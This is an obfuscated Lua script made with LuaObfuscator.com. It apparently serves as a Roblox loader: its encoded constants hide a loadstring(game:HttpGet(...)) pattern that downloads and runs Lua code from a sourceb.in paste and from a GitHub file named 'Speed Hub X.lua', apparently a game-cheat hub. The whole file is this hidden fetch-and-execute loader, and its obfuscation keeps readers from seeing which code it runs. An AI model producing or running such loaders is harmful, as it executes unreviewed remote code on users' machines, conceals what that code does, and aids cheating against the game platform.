--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v91=v5(v80,v19);v19=nil;return v91;else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=0;local v82;while true do if (v81==((0 + 0) -0)) then v82=(v31/((5 -3)^(v32-1)))%(((3 -0) -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v82-(v82%(569 -(367 + 201))) ;end end else local v83=1065 -(68 + 997) ;local v84;while true do if (v83==((2197 -(226 + 1044)) -((931 -717) + 713))) then v84=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=(278 -161) -(32 + 85) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + 65)) ;v34=1;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23() local v38=180 -(67 + (204 -91)) ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (12302277 + 4474939)) + (v41 * (160901 -95365)) + (v40 * (189 + 67)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + (10 -6) ;v38=1;end end end local function v24() local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,998 -(915 + 82) ,20) * ((5 -3)^32)) + v43 ;local v47=v20(v44,13 + 8 ,40 -9 );local v48=((v20(v44,(1657 -(145 + 293)) -(1069 + 118) )==(2 -(431 -(44 + 386)))) and  -(1 -0)) or (1 + (1486 -(998 + 488))) ;if (v47==(0 -0)) then if (v46==(0 + 0 + 0)) then return v48 * (791 -(368 + 423)) ;else v47=(3 + 0) -2 ;v45=18 -(10 + 8) ;end elseif (v47==(7874 -5827)) then return ((v46==(442 -(416 + (798 -(201 + 571))))) and (v48 * (1/0))) or (v48 * NaN) ;end return v8(v48,v47-((4404 -(116 + 1022)) -(9338 -7095)) ) * (v45 + (v46/((1 + 1)^(91 -39)))) ;end local function v25(v49) local v50=885 -(261 + 624) ;local v51;local v52;while true do if ((2 + 0)==v50) then v52={};for v92=3 -2 , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=(1923 -(1789 + 124)) -7 ;end if (v50==(860 -(814 + 45))) then v51=v3(v16,v18,(v18 + v49) -((768 -(745 + 21)) -(1 + 0)) );v18=v18 + v49 ;v50=1 + 1 ;end if (v50==(2 + 1)) then return v6(v52);end if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 -0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53==2) then for v94= #"|",v23() do local v95=(function() return 0 -0 ;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do if (v95~=(1 + 0)) then else while true do if (v96==(0 -0)) then v97=(function() return v21();end)();if (v20(v97, #"]", #"<")~=(285 -(134 + 151))) then else local v163=(function() return 1665 -(970 + 695) ;end)();local v164=(function() return;end)();local v165=(function() return;end)();local v166=(function() return;end)();while true do if (v163~=(1253 -(721 + 530))) then else if (v20(v165, #"[", #"{")~= #"{") then else v166[1273 -(945 + 326) ]=(function() return v59[v166[3 -1 ]];end)();end if (v20(v165,4 -2 ,1992 -(582 + 1408) )~= #",") then else v166[ #"nil"]=(function() return v59[v166[ #"-19"]];end)();end v163=(function() return 703 -(271 + 429) ;end)();end if (v163~=(0 -0)) then else local v185=(function() return 0;end)();while true do if (v185==(1501 -(1408 + 92))) then v163=(function() return 1 -0 ;end)();break;end if (v185~=(0 -0)) then else v164=(function() return v20(v97,1290 -(993 + 295) , #"xxx");end)();v165=(function() return v20(v97, #"asd1",6);end)();v185=(function() return 1;end)();end end end if (v163==(1825 -(1195 + 629))) then local v186=(function() return 0 -0 ;end)();local v187=(function() return;end)();while true do if (v186==(0 + 0)) then v187=(function() return 241 -(187 + 54) ;end)();while true do if ((781 -(162 + 618))==v187) then v163=(function() return 2;end)();break;end if (0==v187) then v166=(function() return {v22(),v22(),nil,nil};end)();if (v164==(0 + 0)) then local v194=(function() return 0 + 0 ;end)();local v195=(function() return;end)();while true do if (v194~=(0 + 0)) then else v195=(function() return 0;end)();while true do if (0==v195) then v166[ #"xnx"]=(function() return v22();end)();v166[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v164== #" ") then v166[ #"gha"]=(function() return v23();end)();elseif (v164==(3 -1)) then v166[ #"nil"]=(function() return v23() -(2^(26 -10)) ;end)();elseif (v164== #"xnx") then local v200=(function() return 0 + 0 ;end)();local v201=(function() return;end)();while true do if (v200==0) then v201=(function() return 1322 -(1249 + 73) ;end)();while true do if (v201==(0 + 0)) then v166[ #"nil"]=(function() return v23() -((1638 -(1373 + 263))^(1016 -(451 + 549))) ;end)();v166[ #"0836"]=(function() return v22();end)();break;end end break;end end end v187=(function() return 1 + 0 ;end)();end end break;end end end if (v163~=(4 -1)) then else if (v20(v165, #"xnx", #"asd")~= #" ") then else v166[ #"http"]=(function() return v59[v166[ #"asd1"]];end)();end v54[v94]=(function() return v166;end)();break;end end end break;end end break;end if (v95==(0 -0)) then local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();while true do if (v104==0) then v105=(function() return 1384 -(746 + 638) ;end)();while true do if (v105~=0) then else v96=(function() return 0 + 0 ;end)();v97=(function() return nil;end)();v105=(function() return 1;end)();end if (v105~=(1 -0)) then else v95=(function() return 1 + 0 ;end)();break;end end break;end end end end end for v98= #"~",v23() do v55[v98-#"]" ]=(function() return v28();end)();end return v57;end if ( #"~"~=v53) then else local v88=(function() return 341 -(218 + 123) ;end)();local v89=(function() return;end)();while true do if (v88==(1581 -(1535 + 46))) then v89=(function() return 0 + 0 ;end)();while true do if (v89==(114 -(4 + 110))) then v58=(function() return v23();end)();v59=(function() return {};end)();v89=(function() return 1;end)();end if ((586 -(57 + 527))~=v89) then else v53=(function() return 1429 -(41 + 1386) ;end)();break;end if (v89~=1) then else for v136= #"~",v58 do local v137=(function() return 0 + 0 ;end)();local v138=(function() return;end)();local v139=(function() return;end)();local v140=(function() return;end)();while true do if ((561 -(306 + 254))==v137) then v140=(function() return nil;end)();while true do if (v138~=(0 + 0)) then else local v189=(function() return 0 -0 ;end)();while true do if (v189~=0) then else v139=(function() return v21();end)();v140=(function() return nil;end)();v189=(function() return 1468 -(899 + 568) ;end)();end if (v189==1) then v138=(function() return  #"{";end)();break;end end end if (v138~= #"/") then else if (v139== #"}") then v140=(function() return v21()~=(0 -0) ;end)();elseif (v139==(5 -3)) then v140=(function() return v24();end)();elseif (v139~= #"-19") then else v140=(function() return v25();end)();end v59[v136]=(function() return v140;end)();break;end end break;end if ((0 + 0)~=v137) then else local v170=(function() return 0;end)();while true do if (v170==1) then v137=(function() return 1 -0 ;end)();break;end if (v170==0) then v138=(function() return 0;end)();v139=(function() return nil;end)();v170=(function() return 3 -2 ;end)();end end end end end v57[ #"gha"]=(function() return v21();end)();v89=(function() return 2 + 0 ;end)();end end break;end end end if (v53~=(0 -0)) then else local v90=(function() return 603 -(268 + 335) ;end)();while true do if (v90==(291 -(60 + 230))) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v90=(function() return 2;end)();end if (v90==(0 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v90=(function() return 1 + 0 ;end)();end if (v90~=(1458 -(282 + 1174))) then else v53=(function() return  #"[";end)();break;end end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1259 -(1043 + 214) ];local v65=v60[11 -8 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1213 -(323 + 889) ;local v71= -(2 -1);local v72={};local v73={...};local v74=v12("#",...) -(581 -(361 + 219)) ;local v75={};local v76={};for v85=320 -(53 + 267) ,v74 do if ((v85>=v68) or (1659>=2134)) then v72[v85-v68 ]=v73[v85 + 1 + 0 ];else v76[v85]=v73[v85 + (414 -(15 + 398)) ];end end local v77=(v74-v68) + (983 -((26 -8) + 964)) ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=(18 -13)) then if (v79<=(2 + 0)) then if (v79<=(0 + 0)) then v76[v78[852 -(20 + 830) ]]=v78[3 + 0 ]~=(126 -(116 + (1102 -(975 + 117)))) ;elseif (v79==(1 + 0)) then local v141=v78[740 -(542 + 196) ];local v142,v143=v69(v76[v141](v13(v76,v141 + (1 -0) ,v78[3])));v71=(v143 + v141) -(1 + 0) ;local v144=0 + 0 ;for v161=v141,v71 do local v162=0;while true do if (v162==0) then v144=v144 + 1 + 0 ;v76[v161]=v142[v144];break;end end end else local v145=1875 -(157 + 1718) ;local v146;local v147;local v148;local v149;while true do if (v145==(0 + 0)) then v146=nil;v147,v148=nil;v149=nil;v145=2 -1 ;end if (v145==((14 -10) -2)) then v149=v78[1553 -(1126 + 425) ];v147,v148=v69(v76[v149](v13(v76,v149 + (406 -(118 + 287)) ,v78[11 -8 ])));v71=(v148 + v149) -1 ;v145=3;end if (v145==3) then v146=0;for v182=v149,v71 do v146=v146 + (1122 -(118 + 1003)) ;v76[v182]=v147[v146];end v70=v70 + (2 -1) ;v145=4;end if ((v145==(383 -((485 -343) + 235))) or (3260<2355)) then v70=v70 + 1 ;v78=v66[v70];v70=v78[13 -10 ];break;end if (v145==(1 + 0)) then v76[v78[979 -(553 + 424) ]]=v78[3]~=((1018 -(697 + 321)) -0) ;v70=v70 + 1 + 0 ;v78=v66[v70];v145=2 + 0 ;end if ((v145==4) or (669==4223)) then v78=v66[v70];v149=v78[(5 -3) + 0 ];v76[v149]=v76[v149](v13(v76,v149 + 1 + 0 ,v71));v145=3 + 2 ;end if (v145==(10 -5)) then v70=v70 + (2 -1) ;v78=v66[v70];v76[v78[(8 -4) -2 ]]();v145=2 + 4 ;end end end elseif (v79<=(14 -11)) then do return;end elseif (v79>4) then local v150=v78[755 -(239 + 514) ];v76[v150]=v76[v150](v13(v76,v150 + 1 ,v71));else v76[v78[4 -2 ]]();end elseif ((v79<=(3 + 5)) or (1692<588)) then if ((v79<=(1335 -(311 + 486 + 532))) or (4797<3651)) then local v107;local v108,v109;local v110;local v111;v76[v78[2 + 0 ]]=v62[v78[(3 -1) + (2 -1) ]];v70=v70 + ((1229 -(322 + 905)) -1) ;v78=v66[v70];v111=v78[1204 -(373 + 829) ];v110=v76[v78[734 -(476 + 255) ]];v76[v111 + (1131 -(369 + 761)) ]=v110;v76[v111]=v110[v78[615 -(602 + 9) ]];v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[2 -0 ]]=v78[5 -2 ];v70=v70 + (239 -(64 + 174)) ;v78=v66[v70];v76[v78[1 + 1 ]]=v78[3 -0 ]~=(336 -(144 + 192)) ;v70=v70 + (217 -(42 + 174)) ;v78=v66[v70];v111=v78[2 + 0 ];v108,v109=v69(v76[v111](v13(v76,v111 + 1 + (1189 -(449 + 740)) ,v78[2 + 1 ])));v71=(v109 + v111) -(1505 -(363 + 1141)) ;v107=0;for v134=v111,v71 do local v135=0;while true do if ((v135==(1580 -(1183 + 397))) or (4177>4850)) then v107=v107 + (2 -1) ;v76[v134]=v108[v107];break;end end end v70=v70 + 1 + 0 ;v78=v66[v70];v111=v78[2 + 0 ];v76[v111]=v76[v111](v13(v76,v111 + 1 ,v71));v70=v70 + (1976 -(1913 + 62)) ;v78=v66[v70];v76[v78[2 + 0 ]]();v70=v70 + ((874 -(826 + 46)) -1) ;v78=v66[v70];v76[v78[1935 -(565 + 1368) ]]=v62[v78[(958 -(245 + 702)) -8 ]];v70=v70 + (1662 -(1477 + 184)) ;v78=v66[v70];v76[v78[2]]=v62[v78[3 -0 ]];v70=v70 + 1 + 0 ;v78=v66[v70];v111=v78[2];v110=v76[v78[3]];v76[v111 + (857 -(564 + (922 -630))) ]=v110;v76[v111]=v110[v78[2 + 2 ]];elseif (v79>(11 -4)) then if (v76[v78[(1903 -(260 + 1638)) -3 ]]==v78[4]) then v70=v70 + 1 ;else v70=v78[307 -(244 + 60) ];end else v76[v78[(442 -(382 + 58)) + 0 ]]=v78[479 -(41 + 435) ];end elseif ((v79<=(1010 -(938 + 63))) or (400>1111)) then v70=v78[3 + 0 ];elseif (v79>((3641 -2506) -(936 + 158 + 31))) then local v154=v78[1 + 1 ];local v155=v76[v78[3]];v76[v154 + (1614 -((3234 -1669) + 48)) ]=v155;v76[v154]=v155[v78[3 + 1 ]];else v76[v78[1140 -(782 + 356) ]]=v62[v78[270 -((522 -346) + 91) ]];end v70=v70 + (2 -(1206 -(902 + 303))) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F46364B7A733032307A522F30034F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F41686D6164562Q392F53702Q65642D4875622D582F6D61696E2F53702Q6564253230487562253230582E6C756100163Q0012073Q00013Q0026083Q0001000100010004093Q0001000100120A000100023Q001206000200033Q00202Q00020002000400122Q000400056Q000500016Q000200056Q00013Q00024Q00010001000100122Q000100023Q00122Q000200033Q00202Q000200020004001207000400064Q0002000500016Q000200056Q00013Q00024Q00010001000100044Q001500010004093Q000100012Q00033Q00017Q00",v9(),...);
